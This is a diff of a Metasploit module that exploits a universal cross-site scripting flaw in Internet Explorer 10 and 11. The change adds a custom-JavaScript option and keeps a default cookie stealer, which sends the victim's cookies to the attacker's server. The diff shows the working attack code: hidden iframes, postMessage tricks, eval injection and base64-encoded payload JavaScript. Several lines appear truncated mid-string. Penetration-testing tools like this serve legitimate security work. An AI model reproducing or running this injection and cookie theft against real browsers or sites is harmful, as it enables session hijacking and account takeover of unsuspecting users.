@@ -11,11 +11,12 @@ class Metasploit3 < Msf::Auxiliary
1111
1212 def initialize ( info = { } )
1313 super ( update_info ( info ,
14- 'Name' => "Microsoft Internet Explorer 10 and 11 Cross-Domain Cookie Stealing " ,
14+ 'Name' => "Microsoft Internet Explorer 10 and 11 Cross-Domain JavaScript Injection " ,
1515 'Description' => %q{
1616 This module exploits a universal cross-site scripting (UXSS) vulnerability found in Internet
1717 Explorer 10 and 11. It will steal the cookie of a specific webiste (set by the TARGET_URI
1818 datastore option). You will also most likely need to configure the URIHOST if you are behind NAT.
19+ If CUSTOMJS isn't specified, a default cookie stealer will kick in.
1920 } ,
2021 'License' => MSF_LICENSE ,
2122 'Author' =>
@@ -36,7 +37,8 @@ def initialize(info={})
3637
3738 register_options (
3839 [
39- OptString . new ( 'TARGET_URI' , [ true , 'The URL for the target iframe' ] )
40+ OptString . new ( 'TARGET_URI' , [ true , 'The URL for the target iframe' ] ) ,
41+ OptString . new ( 'CUSTOMJS' , [ false , 'Custom JavaScript' ] )
4042 ] , self . class )
4143 end
4244
@@ -94,12 +96,17 @@ def server_uri
9496 @server_uri ||= get_uri
9597 end
9698
99+ def js
100+ datastore [ 'CUSTOMJS' ] || %Q|var e = document.createElement('img'); e.src='#{ server_uri } #{ ninja_cookie_stealer_name }
101+ end
102+
97103 def html
98104 %Q|
99105<iframe style="display:none" src="#{ get_resource }
100106<iframe style="display:none" src="#{ datastore [ 'TARGET_URI' ] }
101107<script>
102- var payload = "var e = document.createElement('img'); e.src='#{ server_uri } #{ ninja_cookie_stealer_name }
108+ window.onmessage = function(e){ top[1].postMessage(atob("#{ Rex ::Text . encode_base64 ( js ) }
109+ var payload = 'window.onmessage=function(e){ setTimeout(e.data); }; top.postMessage(\\ \\ "\\ \\ ",\\ \\ "*\\ \\ ")';
103110 top[0].eval('_=top[1];with(new XMLHttpRequest)open("get","#{ get_resource }
104111</script>
105112 |
0 commit comments